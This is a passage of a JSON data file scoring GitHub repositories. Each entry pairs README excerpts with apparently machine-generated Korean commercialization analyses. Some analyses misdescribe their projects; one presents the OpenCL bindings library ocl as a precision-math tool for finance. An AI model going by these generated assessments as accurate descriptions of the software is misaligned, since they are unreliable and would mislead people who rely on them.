src=\"https://youdoc.github.io/img/tencent.jpg\" alt=\"AD\" ></a>\n</p>\n<p align=\"center\">\n    <a href='https://github.com/201206030/novel-plus'><img alt=\"Github stars\" src=\"https://img.shields.io/github/stars/201206030/novel-plus?logo=github\"></a>\n    <a href='https://github.com/201206030/novel-plus'><img alt=\"Github forks\" src=\"https://img.shields.io/github/forks/201206030/novel-plus?logo=github\"></a>\n    <a href='https://gitee.com/novel_dev_team/novel-plus'><img alt=\"Gitee stars\" src=\"https://gitee.com/novel_dev_team/novel-plus/badge/star.svg?theme=gitee\"></a>\n    <a href='https://gitee.com/novel_dev_team/novel-plus'><img alt=\"Gitee forks\" src=\"https://gitee.com/novel_dev_team/novel-plus/badge/fork.svg?theme=gitee\"></a>\n    <a href='https://github.com/201206030/novel-plus/releases'><img alt=\"GitHub downloads\" src=\"https://img.shields.io/gith","composite_score":0.06,"license_safety_tag":"safe"},{"name":"turms-im/turms","github_url":"https://github.com/turms-im/turms","stars":52,"language":"Java","license":"Apache-2.0","abandonment_months":3,"description":"# Turms-IM 상용화 분석 보고서\n\n## 왜 보물인가\n메시지 주고받는 기능을 원하는 모든 앱·서비스에 즉시 탑재할 수 있는 완성된 통신 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 협업 툴(팀 메신저, 팀 메모장 등)에 실시간 채팅 기능 추가\n2. **내부 업무 도구**: 회사 직원들이 사용하는 전용 메신저 시스템 구","readme_excerpt":"<p align=\"center\">\n  <img height=\"100\" src=\"https://raw.githubusercontent.com/turms-im/assets/9dbc34a9d78a68f9f7df2430b4066c82bf8a458f/logo/logo.svg\">\n</p>\n\n[简体中文](https://turms-im.github.io/docs/zh-CN/)\n\n## What is Turms\n\nTurms is the most advanced open-source instant messaging engine for 100K~10M concurrent users in the world.\nPlease refer to [Turms Documentation](https://turms-im.github.io/docs) for details.\n\n## Playground\n(Version of demo servers: `ghcr.io/turms-im/turms-admin:latest`, `ghcr.io/turms-im/turms-gateway:latest`, `ghcr.io/turms-im/turms-service:latest`)\n\n* turms-admin: http://playground.turms.im:6510\n\n  Both the account and the password are: `guest`. (The account is allowed to query and add data, but is not allowed to update and delete data.)\n\n* turms-gateway: http://playground.turms.im:10510 (port for WebSocket access) and http://playground.turms.im:11510 (port for TCP access)\n\n* turms-service (Admin API in dev environment with fake data supported): http://playground.","composite_score":0.0599,"license_safety_tag":"safe"},{"name":"katherinepeterson/readme.so","github_url":"https://github.com/katherinepeterson/readme.so","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":2,"description":"# readme.so 분석 보고서\n\n## 왜 보물인가\n누구나 예쁜 README 문서를 직접 코딩하지 않고도 몇 번의 클릭만으로 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 깃허브 프로필 꾸미기 서비스로 월 구독 모델 운영\n2. **내부 업무 도구**: 개발팀이 프로젝트 문서화 시간을 줄이는 엔터프라이즈 라이선스 판매\n","readme_excerpt":"# readme.so\n\nReadme.so is an online editor to help developers make readmes for their project.\n\nLink to production site: [readme.so](https://readme.so)\n\n## Features\n\n- Choose from list of sections to add to your readme\n- Edit the contents of each section\n- Drag and drop to rearrange sections\n- Download your readme file\n\n## Contributing\n\nContributions are always welcome!\n\nSee [CONTRIBUTING.md](/CONTRIBUTING.md) for ways to get started.\n\n## Tech Stack\n\n- [Next.js](https://nextjs.org/)\n- [TailwindCSS](https://tailwindcss.com/)\n- [dnd kit](https://dndkit.com/)\n- [react-markdown](https://github.com/remarkjs/react-markdown)\n\n## Running the Dev Server\n\nTo run the dev server, run `npm run dev` and navigate to `localhost:3000`\n\n## Feedback\n\nFeedback is appreciated! Reach out on [Twitter](https://twitter.com/katherinecodes) or submit a new issue!\n\n## License\n\n[MIT](/LICENSE)\n\nThis readme was created with [readme.so](https://readme.so) :)\n","composite_score":0.0595,"license_safety_tag":"safe"},{"name":"jordansissel/fpm","github_url":"https://github.com/jordansissel/fpm","stars":6,"language":"Ruby","license":"NOASSERTION","abandonment_months":1,"description":"# jordansissel/fpm 프로젝트 분석\n\n## 왜 보물인가\n여러 운영체제에서 소프트웨어를 쉽게 배포할 수 있도록 만들어주는 도구로, 기업의 소프트웨어 배포 비용과 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 소프트웨어 회사들이 고객 서버에 자동으로 프로그램을 설치할 때 사용\n- **내부 업무","readme_excerpt":"fpm\n===\n\n|Gem|\n\nThe goal of fpm is to make it easy and quick to build packages such as rpms,\ndebs, OSX packages, etc.\n\nfpm, as a project, exists to help you build packages, therefore:\n\n* If fpm is not helping you make packages easily, then there is a bug in fpm.\n* If you are having a bad time with fpm, then there is a bug in fpm.\n* If the documentation is confusing, then this is a bug in fpm.\n\nIf there is a bug in fpm, then we can work together to fix it. If you wish to\nreport a bug/problem/whatever, I welcome you to do on `the project issue tracker`_.\n\n.. _the project issue tracker: https://github.com/jordansissel/fpm/issues\n\nYou can find out how to use fpm in the `documentation`_.\n\n.. _documentation: https://fpm.readthedocs.io/en/latest/\n\nYou can learn how to install fpm on your platform in the `installation guide`_.\n\n.. _installation guide: https://fpm.readthedocs.io/en/latest/installation.html\n\nProject Principles\n------------------\n\n* Community: If a newbie has a bad time, it's a b","composite_score":0.0594,"license_safety_tag":"unknown"},{"name":"scylladb/scylla","github_url":"https://github.com/scylladb/scylla","stars":7,"language":"C++","license":"agpl-3.0","abandonment_months":0,"description":"# ScyllaDB 재산 평가 보고서\n\n## 왜 보물인가\n매우 빠른 속도로 대량의 데이터를 처리하는 데이터베이스로, 금융·게임·실시간 분석 같은 초고속 서비스가 필요한 기업들의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **금융사 실시간 거래 플랫폼**: 주식거래 및 암호화폐 거래소의 신속한 거래 처리 시스템\n2. **게임사 멀티플레이 백엔드**: ","readme_excerpt":"# Scylla\n\n[![Slack](https://img.shields.io/badge/slack-scylla-brightgreen.svg?logo=slack)](http://slack.scylladb.com)\n[![Twitter](https://img.shields.io/twitter/follow/ScyllaDB.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=ScyllaDB)\n\n## What is Scylla?\n\nScylla is the real-time big data database that is API-compatible with Apache Cassandra and Amazon DynamoDB.\nScylla embraces a shared-nothing approach that increases throughput and storage capacity to realize order-of-magnitude performance improvements and reduce hardware costs.\n\nFor more information, please see the [ScyllaDB web site].\n\n[ScyllaDB web site]: https://www.scylladb.com\n\n## Build Prerequisites\n\nScylla is fairly fussy about its build environment, requiring very recent\nversions of the C++23 compiler and of many libraries to build. The document\n[HACKING.md](HACKING.md) includes detailed information on building and\ndeveloping Scylla, but to get Scylla building quickly on (almost) any build\nmachine","composite_score":0.0593,"license_safety_tag":"risky"},{"name":"giongto35/cloud-morph","github_url":"https://github.com/giongto35/cloud-morph","stars":15,"language":"Python","license":"MIT","abandonment_months":3,"description":"# Cloud-Morph 사업화 분석\n\n## 왜 보물인가\n컴퓨터 작업을 언제 어디서나 원격으로 처리할 수 있게 해주는 클라우드 기반 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 그래픽 디자인이나 영상 편집이 필요한 사용자들이 고사양 장비 구매 없이 웹브라우저에서 작업하는 서비스\n- **내부 업무 도구**: 대기업의 원격근무 직원들이","readme_excerpt":"**Decentralized, Self-hosted Cloud Gaming service on WebBrowser.**  \n**Video Demo**: https://youtu.be/eFR7fLy9z6E  \n**Technical Document**: https://github.com/giongto35/cloud-morph/wiki  \n**Landing Page**: https://cloudmorph.io  \n**CloudRetro**: [https://github.com/giongto35/cloud-game](https://github.com/giongto35/cloud-game): Sister project, Cloud Gaming Service For Retro Games  \n\n## Introduction\n\nCloudMorph is a decentralized, self-hosted cloud gaming/cloud application platform. Users can quickly spawn up a cloud gaming service with minimal configuration. By leveraging the ease of deployment, CloudMorph goal is to build a decentralized cloud application network with app providers and consumers.  \nCloudMorph copes with different technical challenges from OS to Cloud, such as Low-Latency Streaming, Video/Audio encoding pipeline and optimization, Windows application Virtualization in headless server, OS event simulation, NAT traversal, P2P network structurization, etc.  \nUnlike [CloudR","composite_score":0.0592,"license_safety_tag":"safe"},{"name":"cogciprocate/ocl","github_url":"https://github.com/cogciprocate/ocl","stars":7,"language":"Rust","license":"NOASSERTION","abandonment_months":3,"description":"# cogciprocate/ocl 저장소 평가\n\n## 왜 보물인가\n수학 계산의 정확도가 중요한 금융, 과학, 공학 분야에서 기존 방식보다 더 신뢰할 수 있는 계산 결과를 제공할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 회계 SaaS**: 은행이나 회계법인이 구독료를 내고 정확한 수익 계산, 세금 계산, 자산평가 서비스로 활용\n2. **","readme_excerpt":"ocl\n===\n\n#### [Documentation](https://docs.rs/ocl) | [Change Log](https://github.com/cogciprocate/ocl/blob/master/RELEASES.md)\n\n[![](https://img.shields.io/crates/v/ocl.svg)](https://crates.io/crates/ocl) [![](https://docs.rs/ocl/badge.svg)](https://docs.rs/ocl)\n[![Supported platforms](https://img.shields.io/badge/platform-windows%20%7C%20macos%20%7C%20linux%20%7C%20bsd-orange.svg)](https://en.wikipedia.org/wiki/Cross-platform)\n[![Linux Build Status](https://travis-ci.org/cogciprocate/ocl.svg?branch=master)](https://travis-ci.org/cogciprocate/ocl)\n\nPure OpenCL&trade; bindings and interfaces for\n[Rust](https://www.rust-lang.org/).\n\n## Goals\n\nTo provide:\n- A simple and intuitive interface to OpenCL devices\n- The full functionality and power of the OpenCL API\n- An absolute minimum of boilerplate\n- Zero or virtually zero performance overhead\n- Thread-safe and automatic management of API pointers and resources\n\n## Usage\n\nEnsure that an OpenCL library is installed for your platform and that ","composite_score":0.0591,"license_safety_tag":"unknown"},{"name":"RSuter/NSwag","github_url":"https://github.com/RSuter/NSwag","stars":5,"language":"C#","license":"mit","abandonment_months":1,"description":"# NSwag 프로젝트 분석\n\n## 왜 보물인가\n웹사이트와 모바일 앱을 만들 때 필요한 '설명서'를 자동으로 만들어주는 도구라서, 개발자들의 귀중한 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **API 관리 SaaS**: 기업이 자체 API를 쉽게 정리하고 공개할 수 있는 웹 서비스로 판매\n2. **내부 업무 도구**: 대기업의 개발팀이 ","readme_excerpt":"## NSwag: The Swagger/OpenAPI toolchain for .NET, ASP.NET Core and TypeScript\n\nNSwag | [NJsonSchema](http://njsonschema.org) | [Apimundo](https://apimundo.com) | [Namotion.Reflection](https://github.com/RicoSuter/Namotion.Reflection)\n\n[![NuGet Version](https://img.shields.io/nuget/v/NSwag.Core.svg)](https://www.nuget.org/packages?q=NSwag)\n[![npm](https://img.shields.io/npm/v/nswag.svg)](https://www.npmjs.com/package/nswag)\n[![NuGet Version Preview](https://img.shields.io/nuget/vpre/NSwag.Core.svg)](https://www.nuget.org/packages?q=NSwag)\n[![build](https://github.com/RicoSuter/NSwag/actions/workflows/build.yml/badge.svg)](https://github.com/RicoSuter/NSwag/actions/workflows/build.yml)\n[![Discord](https://img.shields.io/badge/Discord-join%20chat-1dce73.svg)](https://discord.gg/BxQNy25WF6)\n[![StackOverflow](https://img.shields.io/badge/questions-on%20StackOverflow-orange.svg?style=flat)](http://stackoverflow.com/questions/tagged/nswag)\n[![Wiki](https://img.shields.io/badge/docs-in%20wiki-","composite_score":0.0588,"license_safety_tag":"safe"},{"name":"lord/slate","github_url":"https://github.com/lord/slate","stars":5,"language":"","license":"unknown","abandonment_months":4,"description":"# lord/slate 저장소 분석\n\n## 왜 보물인가\n정확한 정보를 부족한 설명으로는 평가할 수 없으며, 저장소명과 기본 정보만으로는 실제 가치를 판단하기 어렵습니다.\n현재 제공된 데이터(Stars 5개, 라이선스 미확인)만으로는 시장성 있는 보물로 분류하기 위험합니다.\n\n## 어디에 쓸 수 있나\n**데이터 부족으로 인한 제한:** 저장소의 구체적인 기능","readme_excerpt":"Slate was a API documentation generator created by @lord in 2013. It was once used to host API docs for projects at NASA, Sony, Best Buy, Clearbit, Dwolla, Parrot Drones, WooCommerce, and Axidraw, among many others.\n\nAs the original creator and administrator of this project, and in the spirit of the various protests and strikes actively going on in the US (as of Jan 2026) I've decided to take it off of GitHub in protest of Microsoft's contracts with ICE and the IDF. You can read more about this decision on [my blog](https://lord.io/leaving-github/). My website also hosts [a read-only archive](https://code.lord.io/slate/) of Slate's code.\n","composite_score":0.0585,"license_safety_tag":"unknown"},{"name":"FunnyWolf/Viper","github_url":"https://github.com/FunnyWolf/Viper","stars":8,"language":"","license":"unknown","abandonment_months":2,"description":"# Viper (FunnyWolf) 분석 보고서\n\n## 왜 보물인가\n저장소 정보가 매우 제한적(설명, 라이선스, 보안 분석 데이터 모두 없음)이어서 실제 가치를 판단하기 어렵습니다. 별 8개라는 낮은 관심도와 함께 투명성 부족이 큰 위험 신호입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 스택이 불명확하여 구체적인 서비스화 시나리오 ","readme_excerpt":"![cover-v5-optimized](./docs/public/og/img_0.png)\n\n<p align=\"center\">\n  <a href=\"https://www.viperrtp.com/guide/getting_start\">Getting-Started</a> ·\n  <a href=\"https://www.viperrtp.com/guide/welcome_to_viper\">Documentation</a>\n</p>\n\n<p align=\"center\">\n    <a href=\"https://www.viperrtp.com/\" target=\"_blank\">\n        <img alt=\"Static Badge\" src=\"https://img.shields.io/badge/Website-F04438\"></a>\n    <a href=\"https://discord.gg/3R9yZvQueT\" target=\"_blank\">\n        <img src=\"https://img.shields.io/badge/Community-blue?logo=discord&labelColor=%20%235462eb&logoColor=%20%23f5f5f5&color=%20%235462eb\"\n            alt=\"chat on Discord\"></a>\n    <a href=\"https://twitter.com/intent/follow?screen_name=viperrtp\" target=\"_blank\">\n        <img src=\"https://img.shields.io/twitter/follow/viperrtp?logo=X&color=%20%23f5f5f5\"\n            alt=\"follow on X(Twitter)\"></a>\n    <a href=\"https://github.com/funnywolf/viper/graphs/commit-activity\" target=\"_blank\">\n        <img alt=\"Commits last month\" src=\"https://","composite_score":0.0584,"license_safety_tag":"unknown"},{"name":"TalAter/annyang","github_url":"https://github.com/TalAter/annyang","stars":5,"language":"TypeScript","license":"mit","abandonment_months":2,"description":"# TalAter/annyang 상용화 분석\n\n## 왜 보물인가\n음성으로 컴퓨터에 명령을 내릴 수 있는 기술로, 손을 쓸 수 없는 상황에서도 기기를 조작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **음성 비서 SaaS**: 회사 직원들이 손이 바쁠 때 음성으로 문서 작성, 일정 관리, 메일 전송을 할 수 있는 업무 소프트웨어\n2. **자동차 인","readme_excerpt":"# annyang!\n\nA tiny JavaScript Speech Recognition library that lets your users control your site with voice commands.\n\n**annyang** has no dependencies, weighs just 2 KB, and is free to use and modify under the MIT license.\n\n## Demo and Tutorial\n\n[Play with some live speech recognition demos](https://www.talater.com/annyang)\n\n## FAQ, Technical Documentation, and API Reference\n\n- [annyang Frequently Asked Questions](https://github.com/TalAter/annyang/blob/master/docs/FAQ.md)\n- [annyang API reference](https://github.com/TalAter/annyang/blob/master/docs/README.md)\n- [annyang tutorial](https://www.talater.com/annyang)\n- [CHANGELOG](https://github.com/TalAter/annyang/blob/master/CHANGELOG.md)\n\n## Install\n\n```sh\nnpm install annyang\n```\n\n## Hello World\n\nIt's as easy as installing annyang and defining the commands you want.\n\n### ESM (recommended)\n\n```js\nimport annyang from 'annyang';\n\nif (annyang.isSpeechRecognitionSupported()) {\n  // Let's define a command.\n  const commands = {\n    'hello': () ","composite_score":0.0584,"license_safety_tag":"safe"},{"name":"hediet/vscode-drawio","github_url":"https://github.com/hediet/vscode-drawio","stars":8,"language":"TypeScript","license":"GPL-3.0","abandonment_months":2,"description":"# hediet/vscode-drawio 분석 보고서\n\n## 왜 보물인가\nVS Code 내에서 다이어그램을 직접 그릴 수 있어, 개발자들이 문서 작업을 위해 다른 프로그램을 오갈 필요가 없습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 팀 협업 문서 플랫폼(노션, 컨플루언스 같은 서비스)에 내장된 다이어그램 기능으로 제공\n2. **내부 업","readme_excerpt":"# Draw.io VS Code Integration\n\n[![](https://img.shields.io/twitter/follow/hediet_dev.svg?style=social)](https://twitter.com/intent/follow?screen_name=hediet_dev)\n\nThis unofficial extension integrates [Draw.io](https://app.diagrams.net/) (also known as [diagrams.net](https://www.diagrams.net/)) into VS Code.  \nMentioned in the official diagrams.net [blog](https://www.diagrams.net/blog/embed-diagrams-vscode).\n\n## Features\n\n-   Edit `.drawio`, `.dio`, `.drawio.svg` or `.drawio.png` files in the Draw.io editor.\n    -   To create a new diagram, simply create an empty `*.drawio`, `*.drawio.svg` or `*.drawio.png` file and open it.\n    -   `.drawio.svg` are valid `.svg` files that can be embedded in Github readme files! No export needed.\n    -   `.drawio.png` are valid `.png` files! No export needed. You should use `.svg` though whenever possible - they look much better!\n    -   To convert between different formats, use the `Draw.io: Convert To...` command.\n-   Uses an offline version of Draw.","composite_score":0.0582,"license_safety_tag":"restricted"},{"name":"mde/ejs","github_url":"https://github.com/mde/ejs","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":1,"description":"# mde/ejs 상용화 분석 보고서\n\n## 왜 보물인가\n웹사이트나 애플리케이션에서 동적으로 HTML 페이지를 생성하는 핵심 기술로, 전 세계 개발자들이 일상적으로 사용하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 맞춤형 이메일 자동 생성 및 템플릿 관리 플랫폼 (e-커머스, HR 솔루션 등)\n2. **내부 업무 도","readme_excerpt":"Embedded JavaScript templates<br/>\n[![Known Vulnerabilities](https://snyk.io/test/npm/ejs/badge.svg?style=flat)](https://snyk.io/test/npm/ejs)\n=============================\n\n## Security\n\nSecurity professionals, before reporting any security issues, please reference the\n<a href=\"https://github.com/mde/ejs/blob/main/SECURITY.md\">SECURITY.md</a>\nin this project, in particular, the following: \"EJS is effectively a JavaScript runtime.\nIts entire job is to execute JavaScript. If you run the EJS render method without\nchecking the inputs yourself, you are responsible for the results.\"\n\nIn short, DO NOT submit 'vulnerabilities' that include this snippet of code:\n\n```javascript\napp.get('/', (req, res) => {\n  res.render('index', req.query);\n});\n```\n\n## Installation\n\n```bash\n$ npm install ejs\n```\n\n### Import or require\n\nSupports both CommonJS and ES Modules.\n\n```javascript\nimport ejs from 'ejs';\n// Or\nconst ejs = require('ejs');\n```\n\n### Compatibility\n\nServer: CommonJS approach (`require`) support","composite_score":0.058,"license_safety_tag":"safe"},{"name":"gejun123456/MyBatisCodeHelper-Pro","github_url":"https://github.com/gejun123456/MyBatisCodeHelper-Pro","stars":5,"language":"","license":"unknown","abandonment_months":4,"description":"# MyBatisCodeHelper-Pro 분석 보고서\n\n## 왜 보물인가\n프로그래머가 반복적인 데이터베이스 연동 코드를 자동으로 생성해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 웹 기반 업무 관리 플랫폼을 빠르게 개발할 때 이 도구를 번들로 제공하여 개발 비용 절감\n2. **내","readme_excerpt":"# Intellij Plugin for Mybatis\n\n[![Jetbrains Plugins](https://img.shields.io/jetbrains/plugin/v/9837-a8translate.svg)][plugin]\n[![Downloads](https://img.shields.io/jetbrains/plugin/d/9837.svg?style=flat-square)][plugin]\n[![加入QQ群](https://img.shields.io/badge/qq4群-46BC99.svg?style=flat-square)](https://qm.qq.com/q/dYYkYSpLoW)\n\n\n<div align=\"left\">\n  <a href=\"https://gejun123456.github.io/MyBatisCodeHelper-Pro/#/en/\" \n     style=\"font-weight: bold; font-size: 16px; color: #007BFF; text-decoration: none;\">\n     English\n  </a>\n</div>\n &nbsp;&nbsp;\n\n> Intellij下Mybatis支持插件 \n\nqq群（插件bug修复 最新版本及问题讨论）  \n2群: 914051156 (人满)\n3群：598080979 (人满)\n4群：232578741 (人满)\n5群: 575733084\n1群备份: 789681969  \n2群备份: 140492753\n添加qq号:1098632410\n\n\n介绍视频: https://www.bilibili.com/video/av50632948\n\n文档地址： https://gejun123456.github.io/MyBatisCodeHelper-Pro/\n\n国内文档地址：https://brucege.com/doc/#/\n\n## 功能\n- **通过方法名(不需要方法的返回值和参数 会自动推导出来)来生成sql 可以生成大部分单表操作的sql 只需要一个方法的名字即可 会自动补全好方法的参数和返回值 和springdatajpa的语句基本一致**\n- **最好的mybatis代码提示，sql","composite_score":0.0578,"license_safety_tag":"unknown"},{"name":"actions-runner-controller/actions-runner-controller","github_url":"https://github.com/actions-runner-controller/actions-runner-controller","stars":10,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# actions-runner-controller 비즈니스 분석\n\n## 왜 보물인가\nGitHub의 자동화 작업을 회사 서버에서 직접 처리하도록 관리해주는 도구로, 보안과 비용 효율성이 필요한 기업들이 찾는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: GitHub 자동화 작업을 안전하게 실행해주는 관리 플랫폼 (월 구독 모델","readme_excerpt":"# Actions Runner Controller (ARC)\n\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/6061/badge)](https://bestpractices.coreinfrastructure.org/projects/6061)\n[![awesome-runners](https://img.shields.io/badge/listed%20on-awesome--runners-blue.svg)](https://github.com/jonico/awesome-runners)\n[![Artifact Hub](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/actions-runner-controller)](https://artifacthub.io/packages/search?repo=actions-runner-controller)\n\n## About\n\nActions Runner Controller (ARC) is a Kubernetes operator that orchestrates and scales self-hosted runners for GitHub Actions.\n\nWith ARC, you can create runner scale sets that automatically scale based on the number of workflows running in your repository, organization, or enterprise. Because controlled runners can be ephemeral and based on containers, new runner instances can scale up or down rapidly and cleanly. For more information about autoscaling, see [\"Autoscaling with ","composite_score":0.0577,"license_safety_tag":"safe"},{"name":"nanopb/nanopb","github_url":"https://github.com/nanopb/nanopb","stars":8,"language":"C","license":"Zlib","abandonment_months":2,"description":"# nanopb 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 IoT 기기처럼 메모리가 적은 장치에서도 데이터를 빠르고 효율적으로 주고받을 수 있도록 만들어주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **IoT 기기 관리 SaaS**: 수백만 개의 센서와 스마트홈 기기에서 데이터를 실시간으로 수집하고 처리하는 클라우드 플랫폼\n2. **내부 업무 ","readme_excerpt":"Nanopb - Protocol Buffers for Embedded Systems\n==============================================\n\n![Latest change](https://github.com/nanopb/nanopb/actions/workflows/trigger_on_code_change.yml/badge.svg)\n![Weekly build](https://github.com/nanopb/nanopb/actions/workflows/trigger_on_schedule.yml/badge.svg)\n\nNanopb is a small code-size Protocol Buffers implementation in ansi C. It is\nespecially suitable for use in microcontrollers, but fits any memory\nrestricted system.\n\n* **Homepage:** https://jpa.kapsi.fi/nanopb/\n* **Git repository:** https://github.com/nanopb/nanopb/\n* **Documentation:** https://jpa.kapsi.fi/nanopb/docs/\n* **Forum:** https://groups.google.com/forum/#!forum/nanopb\n* **Stable version downloads:** https://jpa.kapsi.fi/nanopb/download/\n* **Pre-release binary packages:** https://github.com/nanopb/nanopb/actions/workflows/binary_packages.yml\n\n\nUsing the nanopb library\n------------------------\nTo use the nanopb library, you need to do two things:\n\n1. Compile your .proto files fo","composite_score":0.0576,"license_safety_tag":"safe"},{"name":"mojs/mojs","github_url":"https://github.com/mojs/mojs","stars":6,"language":"CoffeeScript","license":"MIT","abandonment_months":1,"description":"# mojs 저장소 분석\n\n## 왜 보물인가\n웹사이트와 앱에서 부드럽고 매력적인 애니메이션 효과를 쉽게 만들 수 있는 도구라서, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 프로젝트 관리 앱에서 작업 완료 시 축하 애니메이션 효과 제공\n- **내부 업무 도구**: 회사 대시보드에서 데이터 ","readme_excerpt":"# mo · js – [![npm](https://img.shields.io/npm/v/@mojs/core.svg)](https://www.npmjs.com/package/@mojs/core) [![ci](https://img.shields.io/github/actions/workflow/status/mojs/mojs/ci.yml?branch=main)](https://github.com/mojs/mojs/actions?query=workflow:\"CI\") [![Coverage Status](https://coveralls.io/repos/mojs/mojs/badge.svg?branch=main)](https://coveralls.io/r/mojs/mojs?branch=main) [![Slack](https://img.shields.io/badge/style-join-ff69b4.svg?label=slack)](https://join.slack.com/t/mojs/shared_invite/zt-dlyxhupt-VR7eV2uwCnvu3Cx~Yc_L9Q)\n\nThe motion graphics toolbelt for the web.\n\n[![mo · js](logo.svg \"mo · js\")](https://mojs.github.io/)\n\n## Intro\n**mo · js** is a javascript motion graphics library that is a **fast, retina ready, modular and open source**. In comparison to other libraries, it has a different syntax and code animation structure approach. The declarative API provides you a complete control over the animation, making it customizable with ease.\n\nThe library provides **built-in","composite_score":0.0575,"license_safety_tag":"safe"},{"name":"mozmorris/react-webcam","github_url":"https://github.com/mozmorris/react-webcam","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# react-webcam 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 카메라를 간단하게 사용할 수 있게 해주는 도구로, 화상 회의, 온라인 출석 확인, 신원 인증 등 카메라가 필요한 모든 웹 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 원격 화상 회의 SaaS 서비스**\n- Zoom, Google Meet 같은 화상 회의 플랫폼에 카메","readme_excerpt":"# react-webcam\n\n[![Build Status][build-badge]][build]\n![downloads][downloads-badge]\n\n<img src=\"Logotype primary.png\" width=\"70%\" height=\"70%\" />\n\n**DEMO:** https://codepen.io/mozmorris/pen/JLZdoP\n\nhttps://www.npmjs.com/package/react-webcam\n\nWebcam component for React. See [http://caniuse.com/#feat=stream](http://caniuse.com/#feat=stream)\nfor browser compatibility.\n\n**Note: Browsers will throw an error if the page is loaded from insecure origin. I.e. Use https.**\n\n## Installation\n\n```shell\n# with npm\nnpm install react-webcam\n\n# with yarn\nyarn add react-webcam\n```\n\n## Demo\n\nhttps://codepen.io/mozmorris/pen/JLZdoP\n\n## Usage\n\n```jsx\nimport React from \"react\";\nimport Webcam from \"react-webcam\";\n\nconst WebcamComponent = () => <Webcam />;\n```\n\n### Props\n\nThe props here are specific to this component but one can pass any prop to the underlying video tag eg `className`, `style`, `muted`, etc\n\n| prop                      | type     | default      | notes                                          ","composite_score":0.0575,"license_safety_tag":"safe"},{"name":"cairoshell/cairoshell","github_url":"https://github.com/cairoshell/cairoshell","stars":12,"language":"C#","license":"Apache-2.0","abandonment_months":3,"description":"# Cairo Shell 상용화 분석\n\n## 왜 보물인가\n컴퓨터 초보자도 명령어 없이 마우스로 조작할 수 있는 사용자 친화적인 시스템 인터페이스로, 복잡한 기술을 단순하게 만드는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 비기술 직원도 쉽게 사용할 수 있는 기업용 관리 대시보드 기반 제공\n2. **내부 업무 도구**: 병원·교육","readme_excerpt":"# Cairo Desktop Environment\n[![Current release](https://img.shields.io/github/v/release/cairoshell/cairoshell?include_prereleases)](https://github.com/cairoshell/cairoshell/releases) ![Build status](https://github.com/cairoshell/cairoshell/workflows/Build/badge.svg)\n\n![Cairo Desktop Environment](http://cairoshell.github.io/img/ss_dynDesk.jpg)\n\n## A customizable, intuitive desktop environment for Windows.\nCairo is a desktop environment for Windows. Our goal is to develop a desktop experience that increases productivity and advances current technology standards. With a focus on stability, performance, and productivity, Cairo aims to deliver an interface that exceeds expectations and delivers superior ease of use.\n\n## Download\nThe latest version of Cairo can be downloaded **[on the Releases page](https://github.com/cairoshell/cairoshell/releases/latest)**.\n\n## Requirements\nWindows 7 SP1, Windows 8.1, Windows 10, or Windows 11\n\n## More information\n- For an overview of Cairo features, [visi","composite_score":0.0575,"license_safety_tag":"safe"},{"name":"cronvel/terminal-kit","github_url":"https://github.com/cronvel/terminal-kit","stars":29,"language":"JavaScript","license":"mit","abandonment_months":4,"description":"# Terminal-kit 상용화 분석\n\n## 왜 보물인가\n명령어 창 기반의 사용자 인터페이스를 쉽게 만들 수 있도록 도와주는 도구로, 복잡한 관리 시스템이나 자동화 도구를 만드는 개발자들의 개발 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 기업용 서버 관리 대시보드**\n클라우드 인프라 회사들이 고객에게 제공하","readme_excerpt":"\n[![★](https://img.shields.io/github/stars/cronvel/terminal-kit.svg?label=❤)](https://github.com/cronvel/terminal-kit/stargazers)\n[![License](https://img.shields.io/github/license/cronvel/terminal-kit.svg)](https://github.com/cronvel/terminal-kit)\n[![Downloads](https://img.shields.io/npm/dm/terminal-kit.svg)](https://www.npmjs.com/package/terminal-kit)\n[![Version](https://img.shields.io/npm/v/terminal-kit.svg)](https://www.npmjs.com/package/terminal-kit)\n[![Run on repl.it](http://repl.it/badge/github/cronvel/terminal-kit)](https://repl.it/github/cronvel/terminal-kit)\n\n[![Stats](https://nodei.co/npm/terminal-kit.png?downloads=true&downloadRank=true&stars=true)](https://www.npmjs.com/package/terminal-kit)\n\n\n\n# Terminal Kit\n\nA full-blown terminal lib featuring: 256 colors, styles, keys & mouse handling, input field, progress bars, \nscreen buffer (including **32-bit composition** and **image loading**), text buffer, and many more...\n\nWhether you just need colors & styles, build a simple in","composite_score":0.0574,"license_safety_tag":"safe"},{"name":"franko/lite-xl","github_url":"https://github.com/franko/lite-xl","stars":7,"language":"Lua","license":"MIT","abandonment_months":3,"description":"# franko/lite-xl 분석 보고서\n\n## 왜 보물인가\n가볍고 빠른 텍스트 편집 